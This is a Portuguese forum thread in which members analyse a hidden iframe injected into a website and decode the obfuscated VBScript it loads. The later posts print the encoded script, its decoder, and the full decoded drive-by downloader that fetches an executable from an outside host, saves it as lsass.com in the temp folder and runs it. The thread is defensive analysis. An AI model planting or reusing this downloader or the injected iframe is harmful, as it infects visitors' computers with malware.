• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

LuBoc

Será este código um Trojan?

13 mensagens neste tópico

Olá a todos(as),

Queria saber se podem dar algumas luzes sobre esta situação:

Há uns dias um amigo, para o qual fiz um site simples, disse-me que o tamanho das letras estavam alteradas! Como estranhei, e isso só poderia acontecer se mexessem no código, e não colocassem tags CSS que usei para a formatação do texto.

Fui ver o código e apareceu isto no código:

<body>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>

Claro que o <iframe>....</iframe> não deveria estar e fui ver o conteúdo dessa página, e tinha isto:

f_trojanmorgam_a52abb5.png

Alguém sabe do que se trata ? Será um trojan ou algo similar ?

O site não tinha ficheiros com atributos que permitissem a escrita externa, como poderá ter acedido aos ficheiros para fazer as alterações?!!!

Cumprimentos,

LuBoc

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Bom as boas noticias é que seja o que for só funca em IE porque isso foi escrito em VBScript :cheesygrin:

Não me parece código ofensivo é criar um texto e escreve-lo la pagina, agora aquele #8#3.... é que acho estranho mas também não domino muito vbs.

O teu host não coloca banners ou assim ?

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

magician :cheesygrin: VBScript :P not VD :) ...corrige lá isso

mas sinceramente não sei o que faz :D

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Bem, ele pega numa string bem marada (d) e faz qualquer coisa num for que corre cada caracter dessas string, agora o quê em particular não sei bem...

Mas o mais engraçado é que todo o script está comentado com o código para comentar em html, mas isso não deve afectar nada se estiver dentro do vbscript.

EDIT: Basicamente, parece-me uma maneira estúpida de escrever o texto que já se encontra na string d, com algumas alterações dependendo do tipo do caracter. Provavelmente fará algum crash no IE, mas trojan não me parece.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Só olhando para o endereço, aposto que é malware. :cheesygrin:

Anyway, experimenta corre-lo mas, na linha s=s+blahblah, mete s=s+"<br />"+blahblah

E depois posta aqui o conteúdo. :P

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Boas....

Estive a ver, e tenho quase a certeza que o que ai está é o código fonte de encriptado que fará qualquer coisa. Passo a explicar...Como já foi dito pelo vbmaster, começa por ler os caracteres da variável "d" um a um. Em seguida para caracter, faz váreas verificações.

Primeiro - Verifica o código ASCII de cada caracter (a=Asc(:)), e deopis consoante o seu valor for 1, 2, 3 ou 4 vai trocalos por 9, 10, 13 ou 34 respectivamente, onde 9 é equivale a um TAB, 10 new line feed, 13 carriage return e 34 correspode a " (aspas). Logo aqui começa a aparecer qualquer coisa....  Estes caracteres na string  da variável "d" correspondem aqueles retangulos entre os caracteres, se repararem existem muitos locais onde estao 2 retangulos seguidos, isso corresponde a um ENTER ou seja, o valor 13 e 10 que num texto corresponde a ENTER (plomenos em VB6 e vbscript).

Depois vêm as linhas "if a<= 31 and a>=14 then" ate "else" que sem ter aqui a string não sei mt bem o que fazem, mas suponho que organize os caracteres da string para gerar o código. O melhor mesmo era disponibilizares ess txt para se poder ver qual era mm o código fonte que isso esconde.

Depois vem "if a>=41 and a<=127 then a=a-1" e "if a<127 then s=s+chr((a) else s=s+b" que completao o código.  Agora que analizei estas 2 linhas já estou a ver +/- o código. O que esta aí é nada mais nada menos que as letras posteriores às que deveriam estar. Ou seja, em vez de um "A" esta um "B", etc... Sendo asim e vendo o inicio o código -> "<script language= VBScript........."

Reparem que entre o "=" e o "V" existe um dos tais rectangulos que só tendo acesso ao txt, se pode saber o que é.

E por fim, guarda o código fonte....

Aqui fica uma tabela ASCII para poderem conferir

LuBoc, se colocasses o txt aqui em anexo era porreiro, para vermos qual era mm o código  :D

Cumps

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Ehehe... ah grande nugun! Temos hacker!

Vejam só a diferença que faz ser cuidados com tudo... estavam a olhar só para a parte inteligível do código...

Essa tecnica é das mais usadas para apanhar o pessoal mais desprevinido... ofuscar um script.

Ehehe... epa... a microsoft e as suas tecnologias perigosas eheheh.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Agora estou bué curioso para ver qual é o código que se encontra por trás. :P

Fiz um wget ao site, aqui está o conteúdo:

d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(⎻␌┐°␍┤*␊±/├°┤B┤┤⎽┘␌┴┤° ␍└␉├├┘␊-.#├┘␊;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$≤<$±/D6$P-$(Njdsptpgu/YNMIUUQ-C$├°┤ TT#±$^$(B␊⎻␊␌/T┤⎽°␉┼O#T/┤≥─° > 2├┤⎽7>HFU≤/P─°⎺ 6#- ␊└- G␉└├°;#T°⎺␊' H°┤ ┤°┼─ ␊┘⎽°␍┤⎻⎽≥ ␉⎺␊ ;$ ⎻┴⎽ ␊°├┤┘⎺␉┤┘⎻⎺ ⎺␉┼°±*#2>└├␉├├)'┬$G┬$,(┘⎺␤/G┘└°T≥├┤°┼┘%W%┤┼─ > G/H°┤T─°␍┘␉└G⎻└␊°⎽(3* └$┼─ ±7#I$ G/CvjmeQbui(unq-;#$&pqfo+#│⎽┘┤° ≤/⎽°├─⎻⎺├°C⎻␊≥;#├␉┬°┤⎻±┘└° Y#-3:#␍└⎻4&\$R<%␋°└└/B──└┘␍'&3%R/=#Fyfd,)┴#A#-U$-1=0├|%?=0cpez?=0iunm?=9#     (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#               =0tdsjqu"

s=""
For i=1 To Len(d)
b=Mid(d,i,1)
a=Asc(b)
If a=1 Then a=9
If a=2 Then a=10
If a=3 Then a=13
If a=4 Then a=34
If a<=31 And a>=14 Then
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4)
i=i+2
Else
if a>=41 and a<=127 then a=a-1
if a <127 then s=s+Chr(a) else s=s+b
End If
Next
document.write s

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Boas..

Ora aqui esta ele :)

<script language="VBScript">
on error resume next

dl = "http://usuarios.arnet.com.ar/alvarezluque/flash7.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set x = df.CreateObject("Microsoft.XMLHTTP","")
set S = df.createobject("Adodb.Stream","")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
' Get temp directory and create our destination name
fname1="lsass.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script></body></html>

Agora só falta saber o que faz aquele flash7.exe  :D

Cumps

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Por isto:

fname1="lsass.com"

Parece que é algo que deve introduzir o Sasser no pc. Arrisco-me a dizer que logo a seguir a abrir essa página em IE7 aparecia a famosa mensagem de shutdown :). Mas há várias vulnerabilidades relacionadas com o LSASS, o Sasser é só uma delas.

Mas, wow, essa cena do código encriptado, excelente!

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Boas...

Bem.. se tem alguma coisa a ver com o Sasser não sei, estove a ver o ficheiro, ele mete-se ao arranque com o nome de "mswinsvcr.exe" e encontra-se em c:\windows\system32. Tentei abrir o exe com um debugger e pareceu-me o exe foi compactado ou encriptado ou sei la, sinceramente não percebo muito de debuggers  :-[... A unica coisa que tive de fazer pra ele desaparecer foi fechar o processo, tira-lo do arranque, e apagar o ficheiro, agora se ele alterou alguma configuração do sistema ou algum programa... isso já não sei  :D

Cumps

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Olá,

Obrigado a todos pelas dicas, realmente é um espertalhão.

A ver se o meu amigo consegue falar com os tipos do alojamento e saber como é que o "gajo" acedeu ao conteúdo do site para colocar isso nas páginas!

Cumprimentos,

LuBoc

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!


Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.


Entrar Agora